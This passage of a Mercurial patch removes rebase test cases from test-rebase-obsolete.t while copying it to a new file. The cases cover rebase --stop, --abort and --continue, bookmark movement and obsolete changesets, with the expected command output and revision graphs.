$ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. - $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [20] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [20] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. - $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete2.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete2.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete2.t @@ -18,732 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . - rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. - -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. - - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [10] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 